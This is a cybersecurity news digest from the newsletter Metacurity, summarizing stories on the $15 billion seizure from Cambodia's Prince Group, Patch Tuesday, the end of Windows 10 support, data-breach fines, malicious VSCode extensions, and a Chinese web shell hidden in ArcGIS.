US seizes $15 billion, sanctions Huione group, and indicts Cambodian scam ringleader

Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.

If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!

The US Justice Department seized about $15 billion worth of bitcoin held in cryptocurrency wallets owned by a man who oversaw a massive “pig butchering” fraud operation based in Cambodia, prosecutors said.

The seizure is the largest forfeiture action sought by the DOJ in history. The multi-agency action involves sanctions from the Office of Foreign Assets Control (OFAC) against 146 targets within the Prince Group TCO, led by Cambodian national Chen Zhi.

Concurrently, the Financial Crimes Enforcement Network (FinCEN) has issued a final rule under Section 311 of the USA PATRIOT Act to sever the Huione Group, a financial services conglomerate, from the US financial system, designating it a "primary money laundering concern."

An indictment charging the alleged pig butcher, Chen Zhi, with wire fraud conspiracy and money laundering conspiracy was unsealed in federal court in Brooklyn, New York.

Zhi, a 38-year-old Chinese-born emigre who is also known as “Vincent,” remains at large, according to the US Attorney’s Office for the Eastern District of New York. Zhi faces up to 40 years in prison if convicted of the charges.

He was identified in court filings as the founder and chairman of Prince Holding Group, a multinational business conglomerate based in Cambodia, which prosecutors said grew “in secret .... into one of Asia’s largest transnational criminal organizations.” The Prince Group allegedly operates 10 scam compounds in Cambodia.

The Treasury Department, in parallel action on Tuesday, designated Prince Group as a transnational criminal organization and announced sanctions against the Zhi and more than 100 associated individuals and entities, for their roles in alleged illicit activity.

The Prince Group, which operates businesses in more than 30 countries, ran “forced-labor scam compounds across Cambodia,” the US Attorney’s Office said. (Dan Mangan / CNBC and Elliptic)

Related:  US Treasury, US Department of Justice, DL News, Decrypt, The Block, Bloomberg, Blockworks, The Guardian, Wall Street Journal, Bitcoin Magazine, CryptoSlate, Crypto Briefing, Watcher Guru, r/Bitcoin, Wired, BBC News, The Record, Payment Security

South Korean officials said that they were trying to bring back missing South Koreans from Cambodia, where hundreds of people have disappeared into online scam centers that steal billions of dollars from victims worldwide.

Outrage in South Korea has grown after 330 people were reported missing after traveling to Cambodia this year, including a 22-year-old university student who was later found dead. Others have been tortured and confined by those running the scams, South Korean officials said.

The victims were lured by high-paying job offers, only to be forced to defraud other South Koreans, officials said.

Most of those reported to have disappeared have since been accounted for, but 79 were still missing in Cambodia, Wi Sung-lac, South Korea’s national security director, said at a news conference. He added that the government would also try to repatriate about 60 people who the Cambodian authorities had detained.

South Korea’s Foreign Ministry said that, starting Thursday, it was barring South Koreans from traveling to parts of Cambodia where scams and human confinements were rife. (John Yoon and Francesca Regalado / New York Times)

Related: Korea Times, Reuters, AFP, The Guardian, South China Morning Post, Yonhap News Agency

Investigative journalists at Lighthouse Reports, in conjunction with a coalition of media partners, discovered that a surveillance company called First Wap has built a phone-tracking empire with a global footprint using its proprietary system Altamides, which is "a unified platform to covertly locate the whereabouts of single or multiple suspects in real-time, to detect movement patterns, and to detect whether suspects are in close vicinity with each other.”

Altamides leaves no trace on the phones it targets, unlike spyware such as Pegasus. Nor does it require a target to click on a malicious link or show any of the telltale signs (such as overheating or a short battery life) of remote monitoring.

Its secret is shrewd use of the antiquated telecom language Signaling System No. 7, known as SS7, that phone carriers use to route calls and text messages. Any entity with SS7 access can send queries requesting information about which cell tower a phone subscriber is nearest to, an essential first step to sending a text message or making a call to that subscriber. But First Wap’s technology uses SS7 to zero in on phone numbers and trace the location of its users. 

 Lighthouse Reports obtained a secret archive containing more than a million instances where Altamides was used to trace cell phones all over the world. This data trove, the majority of which spans 2007 to 2014, is one of the largest disclosures to date of the inner workings of the vast surveillance industry. It does not just list the phone numbers of people who were monitored; it offers, in many cases, precise maps of their movements, showing where they went and when. Over months of research, Lighthouse, Germany’s Paper Trail Media, Mother Jones, Reveal, and an international consortium of partners dug into these logs to understand who was being spied on and why.

The journalists identified surveillance targets in 100 countries and spoke to dozens of them. (Gabriel Geiger, Crofton Black, Emmanuel Freudenthal, and Riccardo Coluccini / Mother Jones)

Related: Lighthouse Reports, Mother Jones on YouTube, Lighthouse Reports, Le Monde, Der Standard, Spiegel, IRPI Media

Microsoft released software updates to plug 172 security holes in its Windows operating systems, including at least two vulnerabilities that are already being actively exploited.

October’s Patch Tuesday also marks the final month that Microsoft will ship security updates for Windows 10 systems.

The first zero-day bug addressed this month (CVE-2025-24990) involves a third-party modem driver called Agere Modem that’s been bundled with Windows for the past two decades. Microsoft responded to active attacks on this flaw by completely removing the vulnerable driver from Windows.

The other zero-day is CVE-2025-59230, an elevation of privilege vulnerability in Windows Remote Access Connection Manager (also known as RasMan), a service used to manage remote network connections through virtual private networks (VPNs) and dial-up networks.

Windows 10 isn’t the only Microsoft OS that is reaching end-of-life today; Exchange Server 2016, Exchange Server 2019, Skype for Business 2016, Windows 11 IoT Enterprise Version 22H2, and Outlook 2016 are some of the other products that Microsoft is sunsetting today. (Brian Krebs / Krebs on Security)

Related: SANS Internet Storm Center, Bleeping Computer, CSO Online, The Register, Qualys, Thurrott, Dark Reading, CyberScoop, AskWoody, The Stack

Yesterday was the official end-of-support date for Microsoft's Windows 10, meaning that Windows 10 users received their last regular security patches and that Microsoft is washing its hands of technical support.

This end-of-support date comes about a decade after the initial release of Windows 10, which is typical for most Windows versions. But it comes just four years after Windows 10 was replaced by Windows 11, a version with stricter system requirements that left many older-but-still-functional PCs with no officially supported upgrade path.

As a result, Windows 10 still runs on roughly 40 percent of the world's Windows PCs (or around a third of US-based PCs), according to StatCounter data.

But this end-of-support date also isn't set in stone. Home users with Windows 10 PCs can enroll in Microsoft's Extended Security Updates (ESU) program, which extends the support timeline by another year. (Andrew Cunningham / Ars Technica)

Related: Bleeping Computer, Windows Central, Bloomberg, Microsoft Support, Windows, ZDNET, Neowin, Windows Latest, The Document Foundation Blog, Computerworld, Windows Report, Microsoft Support,  r/technology, r/technews, Slashdot, Tom's Guide

Outsourcing giant Capita was fined £14m (around $19 million) by the Information Commissioner’s Office (ICO) for failing to protect personal data after hackers stole 6.6 million people’s information during a cyber attack in 2023.

The data watchdog confirmed the March 2023 breach exposed a wide array of personal information, including pension details, staff records, and customer data from organizations supported by Capita.

Crucially, this also encompassed highly sensitive categories such as criminal records, financial details, and 'special category data' covering race, religion, and sexual orientation.

The ICO apportioned the fine, with £8m (around $11 million) levied against Capita and £6m (around $6 million) for Capita Pension Solutions. The latter, processing data for over 600 pension schemes, saw 325 associated organizations also affected by the breach.

John Edwards, UK information commissioner, said: “Capita failed in its duty to protect the data entrusted to it by millions of people. (Holly Williams / Independent)

Related: ICO, The Guardian, Consumer Voice, Financial Times, Irish News, Infosecurity Magazine

Computer hacker and former college student Matthew Lane, who was a teenager when he carried out a massive cyberattack on education technology company PowerSchool, was sentenced in federal court to four years in prison and ordered to pay more than $14 million in restitution.

Lane, a former Assumption University freshman who federal prosecutors described as a sophisticated and experienced cybercriminal, told a federal judge that his crimes occurred during an “extremely dark time in my life,” but acknowledged, “I deserve to be punished.”

In June, Lane pleaded guilty to what is widely considered the largest exposure of private student data in history, a breach that compromised the sensitive information of some 60 million students and 10 million educators.

Lane said he takes “full responsibility” for his crimes but that he was “disconnected from reality” while he engaged in hacking. He has since become “sober not just from drugs, but from the internet as well,” he told the judge.

Accompanied in court by family members and several friends, Lane broke down and sobbed after learning his sentence, which includes three years of supervised release and a $25,000 fine. (Mark Keierleber / The74)

Related: Worcester Telegram and Gazette, Reuters

According to the Department of Homeland Security, criminal organizations operating out of China, which investigators blame for all those toll and postage text messages, have used them to make more than $1 billion over the last three years.

Behind the con, investigators say, is a black market connecting foreign criminal networks to server farms that blast scam texts to victims. The scammers use phishing websites to collect credit-card information. They then find gig workers in the US who will max out the stolen cards for a small fee.

Making the fraud possible: an ingenious trick allowing criminals to install stolen card numbers in Google and Apple Wallets in Asia, then share the cards with people in the US, making purchases half a world away.

Criminal gangs can flood people with text messages using SIM farms, rooms jammed with boxes of networking devices. The servers are stuffed with the little white cards that mobile customers put in their new phones to begin making calls or sending texts.

“One person in a room with a SIM farm can send out the number of text messages that 1,000 phone numbers could send out,” said Adam Parks, an assistant special agent in charge at Homeland Security Investigations, the investigative arm of DHS.

Criminal gangs overseas typically operate the farms remotely, but hire gig workers in the US to set them up. The gangs recruit the workers via the WeChat messaging app, Parks said. Workers needing help have instruction manuals and live technical support. (Robert McMillan / Wall Street Journal)

Related: The Independent

The Brevard County, FL, deputy's office said that a real estate scam nearly left one Brevard County resident out of over $1.7 million.

The incident was reported back in July after hackers infiltrated an email chain between “parties involved in a large property purchase.”

The hackers impersonated the sellers and changed the wire transfer instructions, causing the buyer to transfer the full amount into the suspects’ account unknowingly, deputies added.

Afterward, the criminals moved $750,000 into another account within the same financial institution,

“The victim discovered the fraud within hours and immediately contacted his bank, and they told him it was unlikely to get the money back,” the deputy's office said. “Thankfully, the victim also alerted the Brevard County Sheriff’s Office, and our Economic Crimes Task Force quickly went to work!”

As a result, the sheriff’s office was able to recover all funds by 10 p.m. the same evening, investigators reported. (Anthony Talcott / Click Orlando)

Related: Brevard County on Facebook, Space Coast Daily

New York State has fined eight major auto insurance companies over $19 million after an investigation uncovered major cybersecurity failures that exposed the personal data of residents, including driver’s license numbers and birthdates.

The car insurance companies involved in the settlement are American Family Mutual Insurance Company/Midvale Indemnity Company, Farmers Insurance, Hagerty Insurance Agency, The Hartford Insurance Group, Infinity Insurance Company, Liberty Mutual Insurance, Metromile, and State Auto Mutual Insurance Company.

These fines come as part of a joint investigation between DFS and the New York State Attorney General’s Office (OAG).

These companies allowed people to obtain a car insurance price quote using an online tool. Some of the companies also provided password-protected tools to insurance agents to generate quotes for customers. 

The OAG’s investigation found that data thieves were able to exploit a “pre-fill” function in the companies’ online quoting tools. After limited private information about an individual was entered through an online quoting tool, the company would “pre-fill” the form with private information purchased from data brokers.

The purpose of “pre-fill” was to insert information the user might not have on hand and make filling out the form easier. For example, by entering limited information into the tool, such as a person’s full name and date of birth, the other fields on the tool were pre-populated, such as an individual’s driver’s license numbers and similar information about other drivers in their household.

The OAG found that the car insurance companies did not take reasonable steps to protect pre-filled private information. The attacks on these eight companies exposed the private information of over 825,000 New Yorkers. Some of the exposed data was later used to file unemployment claims during the COVID-19 pandemic. (Fingerlakes1 and New York Attorney General)

Related: Hoodline

A politically charged message was broadcast over the public address system at Harrisburg International Airport, prompting police to investigate.

An unauthorized user gained access to the system and played a recorded message that included a list of alleged hackers followed by the statement, “[Expletive] Netanyahu and Trump.”

The message did not contain any threats to the airport nor its tenants, airlines, or passengers, the airport said in a statement.

“During this incident, a Delta flight was boarding,” the statement said. “Out of an abundance of caution, the aircraft was searched. No security issues were found, and the flight departed safely.”

Flights are operating normally at the airport, which is the third largest in Pennsylvania. (Alton Northup, McKenzie Jarrell / ABC27)

Related: WGAL, Daily Voice

The US Army is poised to set up a new command or center to oversee the service’s data environment, according to a senior officer.

Lt. Gen. Jeth Rey, deputy chief of staff, G-6, said that he’s slated to brief Army Chief of Staff Gen. Randy George on Oct. 30 to get final approval of the “plan of action.”

The initiative is coming as the service is pursuing Next Generation Command and Control (NGC2) and other data-centric modernization initiatives.

“Data is the new ammunition, so we’re going to focus on it. And because of that, the team and I have said, ‘Hey, we have got to do something for the Army” enterprise, Rey told reporters on the sidelines of the annual AUSA conference. “So we’re going to stand up what is called the Army data operations center or command. … The name hasn’t been labeled yet. But the team is actually in its infancy, standing up for [initial operating capability] to oversee the entire Army’s data environment when it comes to Next Gen C2 and really beyond that. It’s not only focused around Next Gen C2. It has a big role in there, but this command is going actually to look at data across all echelons.” (Jon Harper / DefenseScoop)

Related: Defense News, Business Insider

German and Bulgarian authorities seized 1,406 active internet domains at the beginning of October, which were used for fraudulent financial investment websites.

Since October 3rd, they have only redirected to a seized page.

To seize the domains, the Cybercrime Center at the Public Prosecutor's Office Karlsruhe, the State Criminal Police Office Baden-Württemberg, and the Federal Financial Supervisory Authority (Bafin), in cooperation with Europol and Bulgarian law enforcement agencies, conducted Operation Heracles. (Daniel AJ Sokolov / Heise)

Related: Bafin.de, DPA, UNN, Daily Finland

Researchers at Koi Security report that a threat actor called TigerJack is constantly targeting developers with malicious extensions published on Microsoft's Visual Code (VSCode) marketplace and OpenVSX registry to steal cryptocurrency and plant backdoors.

A threat actor called TigerJack is constantly targeting developers with malicious extensions published on Microsoft's Visual Code (VSCode) marketplace and OpenVSX registry to steal cryptocurrency and plant backdoors.

The campaign has distributed at least 11 malicious VSCode extensions since the beginning of the year. Two of those extensions kicked from the VSCode marketplace are named C++ Playground and HTTP Format, and have been reintroduced on the platform through new accounts, the researchers say.

When launched, C++ Playground registers a listener (‘onDidChangeTextDocument’) for C++ files to exfiltrate source code to multiple external endpoints. The listener fires about 500 milliseconds after edits to capture keystrokes in near-real time.

According to Koi Security, HTTP Format works as advertised but secretly runs a CoinIMP miner in the background, using hardcoded credentials and configuration to mine crypto using the host’s processing power.

The miner does not appear to implement any restrictions for resource usage, leveraging the entire computing power for its activity. (Bill Toulas / Bleeping Computer)

Related: Koi Security, SecurityLab.ru

Researchers at ReliaQuest say that the Chinese state hacking group Flax Typhoon remained undetected in a target environment for more than a year by turning a component in the ArcGIS geo-mapping tool into a web shell.

The ArcGIS geographic information system (GIS) is developed by Esri (Environmental Systems Research Institute) and has support for server object extensions (SOE) that can extend the basic functionality. The software is used by municipalities, utilities, and infrastructure operators to collect, analyze, visualize, and manage spatial and geographic data through maps.

The attacker used their access to upload a malicious Java SOE acting as a web shell that accepted base64-encoded commands through a REST API parameter (layer) and executed them on the internal ArcGIS server, where they appeared as routine operations.

The exchange was protected by a hardcoded secret key, ensuring that only the attackers had access to this backdoor.

ReliaQuest observed suspicious actions targeting two workstations belonging to the target organization's IT staff, as the hacker tried to dump the Security Account Manager (SAM) database, security registry keys, and LSA secrets. (Bill Toulas / Bleeping Computer)

Related: ReliaQuest, Dark Reading, Security Affairs

Researchers at Eclypsium report that around 200,000 Linux computer systems from American computer maker Framework were shipped with signed UEFI shell components that could be exploited to bypass Secure Boot protections.

An attacker could take advantage to load bootkits (e.g., BlackLotus, HybridPetya, and Bootkitty) that can evade OS-level security controls and persist across OS re-installs.

The problem stems from including a 'memory modify' (mm) command in legitimately signed UEFI shells that Framework shipped with its systems.

The command provides direct read/write access to system memory and is intended for low-level diagnostics and firmware debugging. However, it can also be leveraged to break the Secure Boot trust chain by targeting the gSecurity2 variable, a critical component in the process of verifying the signatures of UEFI modules.

Impacted users are recommended to apply the available security updates. Where a patch isn't available yet, secondary protection measures like physical access prevention are crucial. Another temporary mitigation is to delete the Framework's DB key via the BIOS. (Bill Toulas / Bleeping Computer)

Related: Eclypsium

Mozilla is working on a built-in VPN for Firefox, with beta tests opening to select users shortly.

Firefox VPN is still an experimental feature in the early stages of development, but users will be selected at random to test it "over the next few months."

Mozilla describes the feature as one that will sit beside the search bar on Firefox, routing web traffic through a Mozilla-managed VPN server, concealing the user's real IP address while adding a layer of encryption to their communications.

Firefox VPN is a different project entirely from Mozilla VPN, a separate, paid-for product. The Firefox version will be free to use and confined to the browser itself, while Mozilla VPN can be used by up to five devices at a time. (Connor Jones / The Register)

Related: Mozilla, PC World

London-based Ploy, a cybersecurity startup, has raised £2.5M (nearly €2.86M or around $3.3 million) in seed funding to address identity-related security breaches.

Osney Capital, with participation from Superseed, Tiny.vc, and Rule30, alongside several angel investors from ForgeRock, Digital Shadows, ZScaler, Rapid7, Egress, and ComplyAdvantage. (Sofia Chesnokova / Tech Funding News)

Related: Silicon Angle, Silicon Canals

HyperBunker, a European startup focused on ransomware and critical data storage and recovery, has raised €800,000 (about $925,000) in seed funding to increase its production capacity for a new anti-ransomware device.

The funding comes from Fil Rouge Capital and Sunfish Venture Capital. (Kevin Townsend / Security Week)

Related: Tech Funding News

LevelBlue, the managed security services provider formerly known as AT&T Cybersecurity, signed a definitive agreement to acquire Cybereason, a Boston-based cybersecurity firm specializing in extended detection and response platforms and digital forensics. 

LevelBlue will fold Cyberreason’s extended detection and response (XDR) platform, threat intelligence team, and digital forensics and incident response (DFIR) capabilities into its managed detection and response (MDR) offerings. (Greg Otto / CyberScoop)

Related: Business Wire,  CTech, Bloomberg, DataBreachToday.com, SecurityWeek

Best Thing of the Day: It's Not Nice to Weaken CISA

Rep. Eric Swalwell (D-CA) sent a letter to acting CISA Director Madhu Gottumukkala raising concerns about staffing levels and the direction of the nation’s primary cybersecurity agency, writing that the “Trump Administration has undertaken multiple efforts to decimate CISA’s workforce, undermining our nation’s cybersecurity.”

Worst Thing of the Day: This Is What Depression Does to a Person

A man who works for the people overseeing America’s nuclear stockpile lost his security clearance after he uploaded 187,000 pornographic images to a Department of Energy (DOE) network. 

Closing Thought